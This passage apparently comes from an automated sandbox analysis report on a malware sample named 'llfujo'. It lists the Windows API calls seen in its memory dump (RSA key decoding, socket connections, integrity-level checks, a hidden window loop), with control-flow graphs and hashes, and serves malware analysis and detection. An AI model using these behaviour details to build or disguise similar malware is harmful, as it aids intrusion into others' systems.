                        • CryptDecodeObject.CRYPT32(00000001,00000013,?,0000008C,00000000,?,?), ref: 00863C40
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.570219919.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_860000_llfujo.jbxd
                        Yara matches
                        Similarity
                        • API ID: Crypt$BinaryString$DecodeObject
                        • String ID: KDBM$KeyDataBlob$RSA1$RSAPUBLICBLOB$SHA1
                        • API String ID: 698452922-1412799199
                        • Opcode ID: 18c5be94ccef0cba62b59a392cc173b1c118f2c6b6c663211872200f4ef1164c
                        • Instruction ID: 3079e65210e39f47aa88cf2d75b64f0e084bc6f3a58e3eb4e5da429aa49c8458
                        • Opcode Fuzzy Hash: 18c5be94ccef0cba62b59a392cc173b1c118f2c6b6c663211872200f4ef1164c
                        • Instruction Fuzzy Hash: 8F712CB294025CAAEB20DF94CC86FDA777CFB44704F1105A6B708F60C1DBB5AA948F59
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 767 864a0a-864b3b call 8664a9 call 866422 * 11 792 864b3d-864b5d call 86632f 767->792 793 864b68-864b6c 767->793 801 864c95-864d10 call 865d13 * 2 call 866158 call 865d13 * 2 792->801 803 864b63-864b66 792->803 795 864b7e-864b82 793->795 796 864b6e-864b7c 793->796 799 864b84-864baf call 866422 795->799 800 864bb1 795->800 798 864bb6-864bd6 ioctlsocket 796->798 798->801 802 864bdc-864be0 798->802 799->798 800->801 822 864d16 801->822 823 864dca-864e32 call 86628e call 865d13 call 866158 call 8648d1 801->823 805 864bf2-864bfb connect 802->805 806 864be2-864bf0 connect 802->806 803->798 809 864c00-864c2e call 86646f select 805->809 806->809 809->801 815 864c30-864c91 ioctlsocket WSAIoctl 809->815 815->801 824 864d19 822->824 826 864dc0-864dc4 824->826 826->823 828 864d1e-864d4b call 86646f select 826->828 828->824 834 864d4d 828->834 834->823 836 864d4f-864d64 call 866c6e 834->836 841 864d66-864d69 836->841 842 864d6b 836->842 841->842 843 864d6f-864dbb call 865d13 * 2 call 866158 841->843 842->823 843->826
                        APIs
                        • ioctlsocket.WS2_32(?,8004667E,00000001), ref: 00864BCF
                        • connect.WS2_32(?,00000002,00000010), ref: 00864BEB
                        • connect.WS2_32(?,00000017,0000001C), ref: 00864BFB
                        • select.WS2_32(00000000,00000000,?,00000000,?), ref: 00864C26
                        • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 00864C49
                        • WSAIoctl.WS2_32(?,98000004,00000001,0000000C,00000000,00000000,?,00000000,00000000), ref: 00864C8C
                        • select.WS2_32(00000000,?,00000000,00000000,?), ref: 00864D44
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.570219919.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_860000_llfujo.jbxd
                        Yara matches
                        Similarity
                        • API ID: connectioctlsocketselect$Ioctl
                        • String ID: `
                        • API String ID: 2054606664-1850852036
                        • Opcode ID: 94832fd69148f78f34e3d37fb0042133a3bdae02baaadc7e367c89caf433b50a
                        • Instruction ID: b7468314551d86866480dc9a606793b8a86f3288089a7d36fc03ca841d8d53e1
                        • Opcode Fuzzy Hash: 94832fd69148f78f34e3d37fb0042133a3bdae02baaadc7e367c89caf433b50a
                        • Instruction Fuzzy Hash: 41D12C71900248BAEB21EBD4CC42FEEBBBCFF08700F114455F655E6191DB71AA58CB66
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        APIs
                        • inet_addr.WS2_32(?), ref: 00862AA0
                        • htons.WS2_32(00000000), ref: 00862AC1
                        • ioctlsocket.WS2_32(?,8004667E,?), ref: 00862AE9
                        • connect.WS2_32(?,?,00000010), ref: 00862AF7
                        • select.WS2_32(00000000,00000000,?,00000000,?), ref: 00862B1D
                        • ioctlsocket.WS2_32(?,8004667E,?), ref: 00862B40
                        Memory Dump Source
                        • Source File: 00000001.00000002.570219919.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_860000_llfujo.jbxd
                        Yara matches
                        Similarity
                        • API ID: ioctlsocket$connecthtonsinet_addrselect
                        • String ID:
                        • API String ID: 2081129316-0
                        • Opcode ID: 44921d093b30c8dd2eefc5652d1f45c3759f6bc25d4c3193b64fbe321687dc0d
                        • Instruction ID: 4ff681899452161237ed9d6532d01fc8a58b4e3a6ce4cf9306985cb7814424c9
                        • Opcode Fuzzy Hash: 44921d093b30c8dd2eefc5652d1f45c3759f6bc25d4c3193b64fbe321687dc0d
                        • Instruction Fuzzy Hash: 77311971900258BADF20EBA4CD42FDEB77DFB08314F114095F644F6091EBB59AA48B6A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        APIs
                        • LocalFree.KERNEL32(?,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 00866014
                        • LocalAlloc.KERNEL32(00000000,?,?,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 0086601E
                        • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,?,?,00000019,?,?,?,00000000,?,00000000), ref: 00866035
                        • GetSidSubAuthority.ADVAPI32(?,00000000,?,TokenIntegrityLevel,?,?,?,00000000,?,?,?,00000019,?,?,?,00000000), ref: 00866045
                        • LocalFree.KERNEL32(?,00000000,?,00000004,?,00000000,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 0086605D
                        • CloseHandle.KERNEL32(?,?,00000000,?,00000004,?,00000000,?,00000019,?,?,?,00000000,?,00000000,00000008), ref: 00866065
                        Memory Dump Source
                        • Source File: 00000001.00000002.570219919.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_860000_llfujo.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Free$AllocAuthorityCloseHandleInformationToken
                        • String ID:
                        • API String ID: 1586583212-0
                        • Opcode ID: 1707c921a7e8f55a14e19b09de659ca5eafb33d8be1dd96373c3de5dc21e3e34
                        • Instruction ID: 82d6e86566a3fecccc4fbb941be364e85f122c77205a533b9c50afac122a62a4
                        • Opcode Fuzzy Hash: 1707c921a7e8f55a14e19b09de659ca5eafb33d8be1dd96373c3de5dc21e3e34
                        • Instruction Fuzzy Hash: 6911F971D0014AFADF11ABE8CD42FEEBB79FF44314F158965B210F5091EB714A24ABA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 944 865609-865686 call 8666b0 * 2 call 865958 CoInitialize call 8664c0 * 2 call 866cb0 957 86594c-865955 call 866cbc 944->957 958 86568c-8656d9 call 8664c0 * 2 944->958 966 865941-865949 958->966 967 8656df-86570a call 8664a9 call 865fb8 958->967 966->957 973 865713-865714 967->973 974 86570c-865711 967->974 976 865735-865762 973->976 974->973 975 865716-865730 call 866cec 974->975 975->976 980 865764-865785 call 8666b0 976->980 981 865788-8657b7 976->981 980->981 986 865936-86593e 981->986 987 8657bd-8657f3 call 8664a9 GetLocalTime SystemTimeToFileTime 981->987 986->966 990 8657f5 987->990 991 8657fa-86581f FileTimeToSystemTime 987->991 990->991 992 865846-8658f5 call 8664c0 991->992 993 865821-86583c 991->993 998 8658f7-86590d 992->998 999 865928-865933 992->999 993->992 1001 86590f-865917 998->1001 1002 86591a-865925 998->1002 999->986 1001->1002 1002->999
                        APIs
                        • CoInitialize.OLE32(00000000), ref: 0086563D
                          • Part of subcall function 00865FB8: LocalFree.KERNEL32(?,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 00866014
                          • Part of subcall function 00865FB8: LocalAlloc.KERNEL32(00000000,?,?,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 0086601E
                          • Part of subcall function 00865FB8: GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,?,?,00000019,?,?,?,00000000,?,00000000), ref: 00866035
                          • Part of subcall function 00865FB8: GetSidSubAuthority.ADVAPI32(?,00000000,?,TokenIntegrityLevel,?,?,?,00000000,?,?,?,00000019,?,?,?,00000000), ref: 00866045
                          • Part of subcall function 00865FB8: LocalFree.KERNEL32(?,00000000,?,00000004,?,00000000,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 0086605D
                          • Part of subcall function 00865FB8: CloseHandle.KERNEL32(?,?,00000000,?,00000004,?,00000000,?,00000019,?,?,?,00000000,?,00000000,00000008), ref: 00866065
                        • GetLocalTime.KERNEL32(?,?,00000030,?,0086534E,?,00000014,?,00000000,00000001,00000000,00000018,?,?,?,00000002), ref: 008657D2
                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,00000030,?,0086534E,?,00000014,?,00000000,00000001,00000000,00000018,?,?), ref: 008657E5
                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00000030,?,0086534E,?,00000014,?,00000000,00000001,00000000,00000018), ref: 00865816
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.570219919.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_860000_llfujo.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$Local$FileFreeSystem$AllocAuthorityCloseHandleInformationInitializeToken
                        • String ID: 0
                        • API String ID: 1744783010-4108050209
                        • Opcode ID: a1c780bd0feac9ba66404310acbc0efb7393dd46e94ea136f93f2a61d3938f50
                        • Instruction ID: 8f794fdd4a27580df6310987cf754b762330f083c0f6b2d8520accb3c5e278bb
                        • Opcode Fuzzy Hash: a1c780bd0feac9ba66404310acbc0efb7393dd46e94ea136f93f2a61d3938f50
                        • Instruction Fuzzy Hash: 62A1E4B5900618AFDB20DB94CC85FDAB3BCFF48304F1140E6E608E7251DA75AA85CF69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        APIs
                        • CreateWindowExA.USER32(00000080,?,?,00C80000,00000FA0,00000FA0,000001F4,00000096,00000000,00000000,?,00000000), ref: 00865EB8
                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00865EDC
                        • TranslateMessage.USER32(?), ref: 00865EE5
                        • DispatchMessageA.USER32(?), ref: 00865EEE
                        Memory Dump Source
                        • Source File: 00000001.00000002.570219919.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_860000_llfujo.jbxd
                        Yara matches
                        Similarity
                        • API ID: Message$CreateDispatchTranslateWindow
                        • String ID:
                        • API String ID: 1603676695-0
                        • Opcode ID: c0988211585519f28889d20caa47f2a62cf186668c5d987b6ff5aa59d4caad1a
                        • Instruction ID: f357160bd0c35d90ef66b911bff188b1bf4eb29764e527b61b4d0862764f816e
                        • Opcode Fuzzy Hash: c0988211585519f28889d20caa47f2a62cf186668c5d987b6ff5aa59d4caad1a
                        • Instruction Fuzzy Hash: 6231EA70E50248BAEB50EFE8CC46FDDB6B8FB04B10F514065B608FA1C1EBB556148BA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1022 865ef9-865f03 1023 865f05-865f30 call 866ae8 1022->1023 1024 865f18-866add call 865958 call 866c3e ExitProcess 1022->1024
                        APIs
                        • ExitProcess.KERNEL32(00000000,0000EA60,0040811D,00002710,0040593C,00000000,00002710,0040593C,00000000), ref: 00866ADD
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.570219919.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_860000_llfujo.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: J$llfujo
                        • API String ID: 621844428-3406935086
                        • Opcode ID: 3e4acc038e22f6ff0e1a9397e63c14ed0e905d77c03657d31d28e17e2454a0a4
                        • Instruction ID: 06057c36ad5daae6d8417a82042c23236f8e6b396d5c8bd5df8c587589e91d6a
                        • Opcode Fuzzy Hash: 3e4acc038e22f6ff0e1a9397e63c14ed0e905d77c03657d31d28e17e2454a0a4
                        • Instruction Fuzzy Hash: E1E0DF3210828DFACF012FC8AC02A9E3F24FB447A2F028032F600A80925A318431AB73
                        Uniqueness

                        Uniqueness Score: -1.00%